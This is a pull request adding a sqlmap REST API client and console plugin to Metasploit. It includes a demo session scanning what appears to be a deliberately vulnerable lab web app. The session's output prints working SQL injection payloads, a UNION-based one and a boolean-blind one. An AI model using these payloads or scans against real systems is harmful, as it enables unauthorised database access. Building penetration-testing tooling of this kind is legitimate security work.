### PR TITLE
sqlmap plugin for sqlmap API

### DIFF
--- a/lib/sqlmap/sqlmap_manager.rb
+++ b/lib/sqlmap/sqlmap_manager.rb
@@ -7,43 +7,43 @@ module Sqlmap
     end
 
     def new_task
-      res = @session.get("/task/new")
+      res = @session.get('/task/new')
       return JSON.parse(res.body)
     end
 
     def delete_task(task_id)
-      res = @session.get("/task/" + task_id + "/delete")
+      res = @session.get('/task/' + task_id + '/delete')
       return JSON.parse(res.body)
     end
 
     def set_option(task_id, key, value)
       post = { key => value }
-      res = @session.post("/option/" + task_id + "/set", nil, post.to_json, {'ctype' => 'application/json'})
+      res = @session.post('/option/' + task_id + '/set', nil, post.to_json, {'ctype' => 'application/json'})
       return JSON.parse(res.body)
     end
 
     def get_options(task_id)
-      res = @session.get("/option/" + task_id + "/list")
+      res = @session.get('/option/' + task_id + '/list')
       return JSON.parse(res.body)
     end
 
     def start_task(task_id, options = {})
-      res = @session.post("/scan/" + task_id + "/start" , nil, options.to_json, {'ctype' => 'application/json'})
+      res = @session.post('/scan/' + task_id + '/start' , nil, options.to_json, {'ctype' => 'application/json'})
       return JSON.parse(res.body)
     end
 
     def get_task_status(task_id)
-      res = @session.get("/scan/" + task_id + "/status")
+      res = @session.get('/scan/' + task_id + '/status')
       return JSON.parse(res.body)
     end
 
     def get_task_log(task_id)
-      res = @session.get("/scan/" + task_id + "/log")
+      res = @session.get('/scan/' + task_id + '/log')
       return JSON.parse(res.body)
     end
 
     def get_task_data(task_id)
-      res = @session.get("/scan/" + task_id + "/data")
+      res = @session.get('/scan/' + task_id + '/data')
       return JSON.parse(res.body)
     end
   end

--- a/lib/sqlmap/sqlmap_manager.rb
+++ b/lib/sqlmap/sqlmap_manager.rb
@@ -1,0 +1,50 @@
+require 'json'
+
+module Sqlmap
+  class Manager
+    def initialize(session)
+      @session = session
+    end
+
+    def new_task
+      res = @session.get("/task/new")
+      return JSON.parse(res.body)
+    end
+
+    def delete_task(task_id)
+      res = @session.get("/task/" + task_id + "/delete")
+      return JSON.parse(res.body)
+    end
+
+    def set_option(task_id, key, value)
+      post = { key => value }
+      res = @session.post("/option/" + task_id + "/set", nil, post.to_json, {'ctype' => 'application/json'})
+      return JSON.parse(res.body)
+    end
+
+    def get_options(task_id)
+      res = @session.get("/option/" + task_id + "/list")
+      return JSON.parse(res.body)
+    end
+
+    def start_task(task_id, options = {})
+      res = @session.post("/scan/" + task_id + "/start" , nil, options.to_json, {'ctype' => 'application/json'})
+      return JSON.parse(res.body)
+    end
+
+    def get_task_status(task_id)
+      res = @session.get("/scan/" + task_id + "/status")
+      return JSON.parse(res.body)
+    end
+
+    def get_task_log(task_id)
+      res = @session.get("/scan/" + task_id + "/log")
+      return JSON.parse(res.body)
+    end
+
+    def get_task_data(task_id)
+      res = @session.get("/scan/" + task_id + "/data")
+      return JSON.parse(res.body)
+    end
+  end
+end

--- a/lib/sqlmap/sqlmap_session.rb
+++ b/lib/sqlmap/sqlmap_session.rb
@@ -1,0 +1,37 @@
+module Sqlmap
+  class Session
+    def initialize(host, port = 8775)
+      @host = host
+      @port = port
+    end
+
+    def get(uri, headers = nil, params = nil)
+      c = Rex::Proto::Http::Client.new(@host, @port)
+      args = {
+        'uri' => uri
+      }
+
+      args['headers'] = headers if headers
+      args['vars_get'] = params if params
+      res = c.request_cgi(args)
+      res = c.send_recv(res)
+      return res
+    end
+
+    def post(uri, headers = nil, data = nil, originator_args = nil)
+      c = Rex::Proto::Http::Client.new(@host, @port)
+      args = {
+        'uri' => uri,
+        'method' => 'POST'
+      }
+
+      args.merge!(originator_args) if originator_args
+
+      args['headers'] = headers if headers
+      args['data'] = data if data
+      res = c.request_cgi(args)
+      res = c.send_recv(res)
+      return res
+    end
+  end
+end

--- a/plugins/sqlmap.rb
+++ b/plugins/sqlmap.rb
@@ -1,0 +1,287 @@
+require 'sqlmap/sqlmap_session'
+require 'sqlmap/sqlmap_manager'
+require 'json'
+
+module Msf
+  class Plugin::Sqlmap < Msf::Plugin
+    class SqlmapCommandDispatcher
+      include Msf::Ui::Console::CommandDispatcher
+
+      def name
+        "Sqlmap"
+      end
+
+      def commands
+        {
+          "sqlmap_new_task" => "It's a task!",
+          "sqlmap_connect" => "sqlmap_connect <host> [<port>]",
+          "sqlmap_list_tasks" => "List the knows tasks. Not stored in a DB, so lives as long as the console does",
+          "sqlmap_get_option" => "Get an option for a task",
+          "sqlmap_set_option" => "Set an option for a task",
+          "sqlmap_start_task" => "Start the task",
+          "sqlmap_get_status" => "Get the status of a task",
+          "sqlmap_get_log" => "Get the running log of a task",
+          "sqlmap_get_data" => "Get the resulting data of the task",
+          "sqlmap_save_data" => "Save the resulting data as web_vulns"
+        }
+      end
+
+      def cmd_sqlmap_connect(*args)
+        if args.length == 0
+          print_error("Need a host, and optionally a port")
+          return
+        end
+
+        host = args[0]
+        port = args.length == 2 ? args[1] : nil
+
+        if !port
+          @manager = Sqlmap::Manager.new(Sqlmap::Session.new(host))
+        else
+          @manager = Sqlmap::Manager.new(Sqlmap::Session.new(host, port))
+        end
+
+        print_good("Set connection settings for host " + host + (port ? " on port " + port : ""))
+      end
+
+      def cmd_sqlmap_set_option(*args)
+        if args.length != 3
+          print_error("Usage:")
+          print_error("\tsqlmap_set_option <taskid> <option_name> <option_value>")
+          return
+        end
+
+        if !@manager
+          print_error("Please run sqlmap_connect <host> first.")
+          return
+        end
+
+        val = args[2]
+        if args[2] =~ /^\d+$/
+          val = val.to_i
+        end
+
+        res = @manager.set_option(args[0], args[1], val)
+        print_status("Success: " + res["success"].to_s)
+      end
+
+      def cmd_sqlmap_start_task(*args)
+        if args.length == 0
+          print_error("Usage:")
+          print_error("\tsqlmap_start_task <taskid> [<url>]")
+          return
+        end
+
+        options = {}
+
+        if args.length == 2
+          options['url'] = args[1]
+        end
+
+        if !options['url'] && @tasks[args[0]]['url'] == ''
+          print_error("You need to specify a URL either as an argument to sqlmap_start_task or sqlmap_set_option")
+          return
+        end
+
+        if !@manager
+          print_error("Please run sqlmap_connect <host> first.")
+          return
+        end
+
+        res = @manager.start_task(args[0], options)
+        print_status("Started task: " + res["success"].to_s)
+      end
+
+      def cmd_sqlmap_get_log(*args)
+        if args.length != 1
+          print_error("Usage:")
+          print_error("\tsqlmap_get_log <taskid>")
+          return
+        end
+
+        if !@manager
+          print_error("Please run sqlmap_connect <host> first.")
+          return
+        end
+
+        res = @manager.get_task_log(args[0])
+
+        res["log"].each do |message|
+          print_status("[#{message["time"]}] #{message["level"]}: #{message["message"]}")
+        end
+      end
+
+      def cmd_sqlmap_get_status(*args)
+        if args.length != 1
+          print_error("Usage:")
+          print_error("\tsqlmap_get_status <taskid>")
+          return
+        end
+
+        if !@manager
+          print_error("Please run sqlmap_connect <host> first.")
+          return
+        end
+
+        res = @manager.get_task_status(args[0])
+
+        print_status("Status: " + res['status'])
+
+      end
+
+      def cmd_sqlmap_get_data(*args)
+        if args.length != 1
+          print_error("Usage:")
+          print_error("\tsqlmap_get_data <taskid>")
+          return
+        end
+
+        @tasks = {} if !@tasks
+
+        if !@manager
+          print_error("Please run sqlmap_connect <host> first.")
+          return
+        end
+
+        @tasks[args[0]] = @manager.get_options(args[0])["options"]
+
+        print_line
+        print_status("URL: " + @tasks[args[0]]['url'])
+
+        res = @manager.get_task_data(args[0])
+
+        tbl = Rex::Ui::Text::Table.new(
+          'Columns' => ['Title','Payload'])
+
+        res["data"].each do |d|
+          d["value"].each do |v|
+            v["data"].each do |i|
+              title = i[1]["title"].split('-')[0]
+              payload = i[1]["payload"]
+              tbl << [title, payload]
+            end
+          end
+        end
+
+        print_line
+        print_line tbl.to_s
+        print_line
+      end
+
+      def cmd_sqlmap_save_data(*args)
+        if args.length != 1
+          print_error("Usage:")
+          print_error("\tsqlmap_save_data <taskid>")
+          return
+        end
+
+        if !(framework.db && framework.db.usable)
+          print_error("No database is connected or usable")
+          return
+        end
+
+        @tasks = {} if !@tasks
+
+        if !@manager
+          print_error("Please run sqlmap_connect <host> first.")
+          return
+        end
+
+        @tasks[args[0]] = @manager.get_options(args[0])["options"]
+
+        print_line
+        print_status("URL: " + @tasks[args[0]]['url'])
+
+        res = @manager.get_task_data(args[0])
+        web_vuln_info = {}
+        url = @tasks[args[0]]['url']
+        proto = url.split(":")[0]
+        host = url.split("/")[2]
+        port = 80
+        port = host.split(":")[1] if host.index(":")
+        host = host.split(":")[0] if host.index(":")
+        path = '/' + (url.split("/")[3..(url.split("/").length - 1)].join('/'))
+        query = url.split("?")[1]
+        web_vuln_info[:web_site] = url
+        web_vuln_info[:path] = path
+        web_vuln_info[:query] = query
+        web_vuln_info[:host] = host
+        web_vuln_info[:port] = port
+        web_vuln_info[:ssl] = (proto =~ /https/)
+        web_vuln_info[:category] = "imported from sqlmap"
+        res["data"].each do |d|
+          d["value"].each do |v|
+            web_vuln_info[:pname] = v["parameter"]
+            web_vuln_info[:method] = v["place"]
+            web_vuln_info[:payload] = v["suffix"]
+            v["data"].each do |k,i|
+              web_vuln_info[:name] = i["title"]
+              web_vuln_info[:description] = res.to_json
+              web_vuln_info[:proof] = i["payload"]
+              framework.db.report_web_vuln(web_vuln_info)
+            end
+          end
+        end
+        print_good("Saved vulnerabilities to database.")    
+      end
+
+      def cmd_sqlmap_get_option(*args)
+        @tasks = {} if !@tasks
+        if args.length != 2
+          print_error("Usage:")
+          print_error("\tsqlmap_get_option <taskid> <option_name>")
+        end
+
+        if !@manager
+          print_error("Please run sqlmap_connect <host> first.")
+          return
+        end
+
+        task_options = @manager.get_options(args[0])
+        @tasks[args[0]] = task_options["options"]
+        print_good(args[1] + ": " + @tasks[args[0]][args[1]].to_s)
+      end
+
+      def cmd_sqlmap_new_task(*args)
+        @tasks = {} if !@tasks
+
+        if !@manager
+          print_error("Please run sqlmap_connect <host> first.")
+          return
+        end
+
+        taskid = @manager.new_task['taskid']
+        task_options = @manager.get_options(taskid)
+        @tasks[taskid] = task_options["options"]
+        print_good("Created task: " + taskid)
+      end
+
+      def cmd_sqlmap_list_tasks(*args)
+        @tasks = {} if !@tasks
+        @tasks.each do |task, options|
+          print_good("Task ID: " + task)
+        end
+      end
+    end
+
+    def initialize(framework, opts)
+      super
+
+      add_console_dispatcher(SqlmapCommandDispatcher)
+
+      print_status("Sqlmap plugin loaded")
+    end
+
+    def cleanup
+      remove_console_dispatcher('Sqlmap')
+    end
+
+    def name
+      "Sqlmap"
+    end
+
+    def desc
+      "Use Sqlmap, yo!"
+    end
+  end
+end

--- a/plugins/sqlmap.rb
+++ b/plugins/sqlmap.rb
@@ -13,22 +13,22 @@ module Msf
 
       def commands
         {
-          "sqlmap_new_task" => "It's a task!",
-          "sqlmap_connect" => "sqlmap_connect <host> [<port>]",
-          "sqlmap_list_tasks" => "List the knows tasks. Not stored in a DB, so lives as long as the console does",
-          "sqlmap_get_option" => "Get an option for a task",
-          "sqlmap_set_option" => "Set an option for a task",
-          "sqlmap_start_task" => "Start the task",
-          "sqlmap_get_status" => "Get the status of a task",
-          "sqlmap_get_log" => "Get the running log of a task",
-          "sqlmap_get_data" => "Get the resulting data of the task",
-          "sqlmap_save_data" => "Save the resulting data as web_vulns"
+          'sqlmap_new_task' => 'It\'s a task!',
+          'sqlmap_connect' => 'sqlmap_connect <host> [<port>]',
+          'sqlmap_list_tasks' => 'List the knows tasks. Not stored in a DB, so lives as long as the console does',
+          'sqlmap_get_option' => 'Get an option for a task',
+          'sqlmap_set_option' => 'Set an option for a task',
+          'sqlmap_start_task' => 'Start the task',
+          'sqlmap_get_status' => 'Get the status of a task',
+          'sqlmap_get_log' => 'Get the running log of a task',
+          'sqlmap_get_data' => 'Get the resulting data of the task',
+          'sqlmap_save_data' => 'Save the resulting data as web_vulns'
         }
       end
 
       def cmd_sqlmap_connect(*args)
         if args.length == 0
-          print_error("Need a host, and optionally a port")
+          print_error('Need a host, and optionally a port')
           return
         end
 
@@ -41,18 +41,18 @@ module Msf
           @manager = Sqlmap::Manager.new(Sqlmap::Session.new(host, port))
         end
 
-        print_good("Set connection settings for host " + host + (port ? " on port " + port : ""))
+        print_good('Set connection settings for host ' + host + (port ? ' on port ' + port : ''))
       end
 
       def cmd_sqlmap_set_option(*args)
         unless args.length == 3
-          print_error("Usage:")
-          print_error("\tsqlmap_set_option <taskid> <option_name> <option_value>")
+          print_error('Usage:')
+          print_error('\tsqlmap_set_option <taskid> <option_name> <option_value>')
           return
         end
 
         unless @manager
-          print_error("Please run sqlmap_connect <host> first.")
+          print_error('Please run sqlmap_connect <host> first.')
           return
         end
 
@@ -62,13 +62,13 @@ module Msf
         end
 
         res = @manager.set_option(@hid_tasks[args[0]], args[1], val)
-        print_status("Success: " + res["success"].to_s)
+        print_status('Success: ' + res['success'].to_s)
       end
 
       def cmd_sqlmap_start_task(*args)
         if args.length == 0
-          print_error("Usage:")
-          print_error("\tsqlmap_start_task <taskid> [<url>]")
+          print_error('Usage:')
+          print_error('\tsqlmap_start_task <taskid> [<url>]')
           return
         end
 
@@ -79,59 +79,59 @@ module Msf
         end
 
         if !options['url'] && @tasks[@hid_tasks[args[0]]]['url'] == ''
-          print_error("You need to specify a URL either as an argument to sqlmap_start_task or sqlmap_set_option")
+          print_error('You need to specify a URL either as an argument to sqlmap_start_task or sqlmap_set_option')
           return
         end
 
         unless @manager
-          print_error("Please run sqlmap_connect <host> first.")
+          print_error('Please run sqlmap_connect <host> first.')
           return
         end
 
         res = @manager.start_task(@hid_tasks[args[0]], options)
-        print_status("Started task: " + res["success"].to_s)
+        print_status('Started task: ' + res['success'].to_s)
       end
 
       def cmd_sqlmap_get_log(*args)
         unless args.length == 1
-          print_error("Usage:")
-          print_error("\tsqlmap_get_log <taskid>")
+          print_error('Usage:')
+          print_error('\tsqlmap_get_log <taskid>')
           return
         end
 
         unless @manager
-          print_error("Please run sqlmap_connect <host> first.")
+          print_error('Please run sqlmap_connect <host> first.')
           return
         end
 
         res = @manager.get_task_log(@hid_tasks[args[0]])
 
-        res["log"].each do |message|
+        res['log'].each do |message|
           print_status("[#{message["time"]}] #{message["level"]}: #{message["message"]}")
         end
       end
 
       def cmd_sqlmap_get_status(*args)
         unless args.length == 1
-          print_error("Usage:")
-          print_error("\tsqlmap_get_status <taskid>")
+          print_error('Usage:')
+          print_error('\tsqlmap_get_status <taskid>')
           return
         end
 
         unless @manager
-          print_error("Please run sqlmap_connect <host> first.")
+          print_error('Please run sqlmap_connect <host> first.')
           return
         end
 
         res = @manager.get_task_status(@hid_tasks[args[0]])
 
-        print_status("Status: " + res['status'])
+        print_status('Status: ' + res['status'])
       end
 
       def cmd_sqlmap_get_data(*args)
         unless args.length == 1
-          print_error("Usage:")
-          print_error("\tsqlmap_get_data <taskid>")
+          print_error('Usage:')
+          print_error('\tsqlmap_get_data <taskid>')
           return
         end
 
@@ -139,25 +139,25 @@ module Msf
         @tasks ||= {}
 
         unless @manager
-          print_error("Please run sqlmap_connect <host> first.")
+          print_error('Please run sqlmap_connect <host> first.')
           return
         end
 
-        @tasks[@hid_tasks[args[0]]] = @manager.get_options(@hid_tasks[args[0]])["options"]
+        @tasks[@hid_tasks[args[0]]] = @manager.get_options(@hid_tasks[args[0]])['options']
 
         print_line
-        print_status("URL: " + @tasks[@hid_tasks[args[0]]]['url'])
+        print_status('URL: ' + @tasks[@hid_tasks[args[0]]]['url'])
 
         res = @manager.get_task_data(@hid_tasks[args[0]])
 
         tbl = Rex::Ui::Text::Table.new(
           'Columns' => ['Title','Payload'])
 
-        res["data"].each do |d|
-          d["value"].each do |v|
-            v["data"].each do |i|
-              title = i[1]["title"].split('-')[0]
-              payload = i[1]["payload"]
+        res['data'].each do |d|
+          d['value'].each do |v|
+            v['data'].each do |i|
+              title = i[1]['title'].split('-')[0]
+              payload = i[1]['payload']
               tbl << [title, payload]
             end
           end
@@ -170,13 +170,13 @@ module Msf
 
       def cmd_sqlmap_save_data(*args)
         unless args.length == 1
-          print_error("Usage:")
-          print_error("\tsqlmap_save_data <taskid>")
+          print_error('Usage:')
+          print_error('\tsqlmap_save_data <taskid>')
           return
         end
 
         unless framework.db && framework.db.usable
-          print_error("No database is connected or usable")
+          print_error('No database is connected or usable')
           return
         end
 
@@ -184,46 +184,46 @@ module Msf
         @tasks ||= {}
 
         unless @manager
-          print_error("Please run sqlmap_connect <host> first.")
+          print_error('Please run sqlmap_connect <host> first.')
           return
         end
 
-        @tasks[@hid_tasks[args[0]]] = @manager.get_options(@hid_tasks[args[0]])["options"]
+        @tasks[@hid_tasks[args[0]]] = @manager.get_options(@hid_tasks[args[0]])['options']
 
         print_line
-        print_status("URL: " + @tasks[@hid_tasks[args[0]]]['url'])
+        print_status('URL: ' + @tasks[@hid_tasks[args[0]]]['url'])
 
         res = @manager.get_task_data(@hid_tasks[args[0]])
         web_vuln_info = {}
         url = @tasks[@hid_tasks[args[0]]]['url']
-        proto = url.split(":")[0]
-        host = url.split("/")[2]
+        proto = url.split(':')[0]
+        host = url.split('/')[2]
         port = 80
-        port = host.split(":")[1] if host.index(":")
-        host = host.split(":")[0] if host.index(":")
-        path = '/' + (url.split("/")[3..(url.split("/").length - 1)].join('/'))
-        query = url.split("?")[1]
+        port = host.split(':')[1] if host.index(':')
+        host = host.split(':')[0] if host.index(':')
+        path = '/' + (url.split('/')[3..(url.split('/').length - 1)].join('/'))
+        query = url.split('?')[1]
         web_vuln_info[:web_site] = url
         web_vuln_info[:path] = path
         web_vuln_info[:query] = query
         web_vuln_info[:host] = host
         web_vuln_info[:port] = port
         web_vuln_info[:ssl] = (proto =~ /https/)
-        web_vuln_info[:category] = "imported from sqlmap"
-        res["data"].each do |d|
-          d["value"].each do |v|
-            web_vuln_info[:pname] = v["parameter"]
-            web_vuln_info[:method] = v["place"]
-            web_vuln_info[:payload] = v["suffix"]
-            v["data"].each do |k,i|
-              web_vuln_info[:name] = i["title"]
+        web_vuln_info[:category] = 'imported from sqlmap'
+        res['data'].each do |d|
+          d['value'].each do |v|
+            web_vuln_info[:pname] = v['parameter']
+            web_vuln_info[:method] = v['place']
+            web_vuln_info[:payload] = v['suffix']
+            v['data'].each do |k,i|
+              web_vuln_info[:name] = i['title']
               web_vuln_info[:description] = res.to_json
-              web_vuln_info[:proof] = i["payload"]
+              web_vuln_info[:proof] = i['payload']
               framework.db.report_web_vuln(web_vuln_info)
             end
           end
         end
-        print_good("Saved vulnerabilities to database.")
+        print_good('Saved vulnerabilities to database.')
       end
 
       def cmd_sqlmap_get_option(*args)
@@ -231,22 +231,22 @@ module Msf
         @tasks ||= {}
 
         unless args.length == 2
-          print_error("Usage:")
-          print_error("\tsqlmap_get_option <taskid> <option_name>")
+          print_error('Usage:')
+          print_error('\tsqlmap_get_option <taskid> <option_name>')
         end
 
         unless @manager
-          print_error("Please run sqlmap_connect <host> first.")
+          print_error('Please run sqlmap_connect <host> first.')
           return
         end
 
         task_options = @manager.get_options(@hid_tasks[args[0]])
-        @tasks[@hid_tasks[args[0]]] = task_options["options"]
+        @tasks[@hid_tasks[args[0]]] = task_options['options']
 
         if @tasks[@hid_tasks[args[0]]]
-          print_good(args[1] + ": " + @tasks[@hid_tasks[args[0]]][args[1]].to_s)
+          print_good(args[1] + ': ' + @tasks[@hid_tasks[args[0]]][args[1]].to_s)
         else
-          print_error("Option " + args[0] + " doesn't exist")
+          print_error('Option ' + args[0] + ' doesn\'t exist')
         end
       end
 
@@ -255,22 +255,22 @@ module Msf
         @tasks ||= {}
 
         unless @manager
-          print_error("Please run sqlmap_connect <host> first.")
+          print_error('Please run sqlmap_connect <host> first.')
           return
         end
 
         taskid = @manager.new_task['taskid']
         @hid_tasks[(@hid_tasks.length+1).to_s] = taskid
         task_options = @manager.get_options(taskid)
-        @tasks[@hid_tasks[@hid_tasks.length]] = task_options["options"]
-        print_good("Created task: " + @hid_tasks.length.to_s)
+        @tasks[@hid_tasks[@hid_tasks.length]] = task_options['options']
+        print_good('Created task: ' + @hid_tasks.length.to_s)
       end
 
       def cmd_sqlmap_list_tasks(*args)
         @hid_tasks ||= {}
         @tasks ||= {}
         @hid_tasks.each do |task, options|
-          print_good("Task ID: " + task.to_s)
+          print_good('Task ID: ' + task.to_s)
         end
       end
     end
@@ -280,7 +280,7 @@ module Msf
 
       add_console_dispatcher(SqlmapCommandDispatcher)
 
-      print_status("Sqlmap plugin loaded")
+      print_status('Sqlmap plugin loaded')
     end
 
     def cleanup
@@ -288,11 +288,11 @@ module Msf
     end
 
     def name
-      "Sqlmap"
+      'Sqlmap'
     end
 
     def desc
-      "Use Sqlmap, yo!"
+      'Use Sqlmap, yo!'
     end
   end
 end


### PR DESCRIPTION
This pull request adds a small API layer in ruby for the sqlmap RESTful API, and a small plugin to drive sqlmap from msfconsole.

If you get the latest sqlmap from git, you will find a `sqlmapapi.py` file, you can start the API on all interfaces listening on port 8775 with:
`sqlmapapi.py --server -H 0.0.0.0`

The command sqlmap_save_data will save any SQL injections found to the database as web_vulns so that the information is useful in community/pro as well.

Happy 4th!

Quick run through:

```
bperry@w00den-pickle:~/tools/msf_dev$ ./msfconsole
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.9.0-dev [core:4.9 api:1.0] ]
+ -- --=[ 1292 exploits - 702 auxiliary - 202 post ]
+ -- --=[ 332 payloads - 33 encoders - 8 nops      ]

msf > load sqlmap
[*] Sqlmap plugin loaded
[*] Successfully loaded plugin: Sqlmap
msf > db_connect postgres:password@192.168.1.21:5432/metasploit
[*] Rebuilding the module cache in the background...
msf > sqlmap_connect 192.168.1.45
[+] Set connection settings for host 192.168.1.45
msf > sqlmap_new_task
[+] Created task: 763480faafd39faf
msf > sqlmap_set_option 763480faafd39faf level 5
[*] Success: true
msf > sqlmap_set_option 763480faafd39faf risk 3
[*] Success: true
msf > sqlmap_start_task 763480faafd39faf http://192.168.1.19/cgi-bin/badstore.cgi?searchquery=fdsa&action=search
[*] Started task: true
msf > sqlmap_get_status 763480faafd39faf
[*] Status: running
msf > sqlmap_get_status 763480faafd39faf
[*] Status: running
msf > sqlmap_get_status 763480faafd39faf
[*] Status: terminated
msf > sqlmap_get_log 763480faafd39faf
[*] [10:56:51] INFO: testing connection to the target URL
[*] [10:56:52] INFO: heuristics detected web page charset 'ISO-8859-2'
[*] [10:56:52] INFO: testing if the target URL is stable. This can take a couple of seconds
[*] [10:56:53] INFO: target URL is stable
[*] [10:56:53] INFO: testing if GET parameter 'searchquery' is dynamic
[*] [10:56:53] INFO: confirming that GET parameter 'searchquery' is dynamic
[*] [10:56:53] INFO: GET parameter 'searchquery' is dynamic
[*] [10:56:53] INFO: heuristics detected web page charset 'ascii'
[*] [10:56:53] INFO: heuristic (basic) test shows that GET parameter 'searchquery' might be injectable (possible DBMS: 'MySQL')
[*] [10:56:53] INFO: testing for SQL injection on GET parameter 'searchquery'
[*] [10:56:53] INFO: testing 'AND boolean-based blind - WHERE or HAVING clause'
[*] [10:56:53] WARNING: reflective value(s) found and filtering out
[*] [10:57:02] INFO: testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[*] [10:57:11] INFO: testing 'OR boolean-based blind - WHERE or HAVING clause'
[*] [10:57:18] INFO: testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
[*] [10:57:25] INFO: testing 'Generic boolean-based blind - Parameter replace (original value)'
[*] [10:57:25] INFO: testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[*] [10:57:26] INFO: testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[*] [10:57:26] INFO: testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[*] [10:57:35] INFO: testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[*] [10:57:42] INFO: testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
[*] [10:57:45] INFO: GET parameter 'searchquery' seems to be 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)' injectable 
[*] [10:57:45] INFO: testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[*] [10:57:45] INFO: testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[*] [10:57:45] INFO: testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[*] [10:57:45] INFO: testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[*] [10:57:45] INFO: testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[*] [10:57:45] INFO: testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[*] [10:57:45] INFO: testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[*] [10:57:45] INFO: testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[*] [10:57:45] INFO: testing 'MySQL OR error-based - WHERE or HAVING clause'
[*] [10:57:45] INFO: testing 'MySQL >= 5.0 error-based - Parameter replace'
[*] [10:57:45] INFO: testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[*] [10:57:45] INFO: testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[*] [10:57:45] INFO: testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[*] [10:57:45] INFO: testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[*] [10:57:45] INFO: testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[*] [10:57:45] INFO: testing 'MySQL inline queries'
[*] [10:57:45] INFO: testing 'MySQL > 5.0.11 stacked queries'
[*] [10:57:45] INFO: testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[*] [10:57:46] INFO: testing 'MySQL > 5.0.11 AND time-based blind'
[*] [10:57:46] INFO: testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[*] [10:57:46] INFO: testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[*] [10:57:46] INFO: testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[*] [10:57:46] INFO: testing 'MySQL > 5.0.11 OR time-based blind'
[*] [10:57:46] INFO: testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[*] [10:57:46] INFO: testing 'MySQL >= 5.0 time-based blind - Parameter replace'
[*] [10:57:46] INFO: testing 'MySQL < 5.0 time-based blind - Parameter replace (heavy queries)'
[*] [10:57:46] INFO: testing 'MySQL time-based blind - Parameter replace (bool*int)'
[*] [10:57:46] INFO: testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[*] [10:57:46] INFO: testing 'MySQL time-based blind - Parameter replace (ELT)'
[*] [10:57:46] INFO: testing 'MySQL >= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses'
[*] [10:57:46] INFO: testing 'MySQL < 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)'
[*] [10:57:46] INFO: testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[*] [10:57:46] INFO: automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[*] [10:57:46] INFO: ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[*] [10:57:46] INFO: target URL appears to have 4 columns in query
[*] [10:57:47] INFO: GET parameter 'searchquery' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[*] [10:57:47] INFO: testing MySQL
[*] [10:57:47] INFO: confirming MySQL
[*] [10:57:47] INFO: the back-end DBMS is MySQL
msf > sqlmap_get_data 763480faafd39faf

[*] URL: http://192.168.1.19/cgi-bin/badstore.cgi?searchquery=fdsa&action=search

Title                      Payload
-----                      -------
MySQL UNION query (NULL)   searchquery=fdsa' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7175707071,0x5662594f65734d6f6f52,0x716c6b7271)#&action=search
MySQL boolean              searchquery=fdsa' RLIKE (SELECT (CASE WHEN (3760=3760) THEN 0x66647361 ELSE 0x28 END)) AND 'VzLt'='VzLt&action=search


msf > sqlmap_save_data 763480faafd39faf

[*] URL: http://192.168.1.19/cgi-bin/badstore.cgi?searchquery=fdsa&action=search
[+] Saved vulnerabilities to database.
msf > 
```
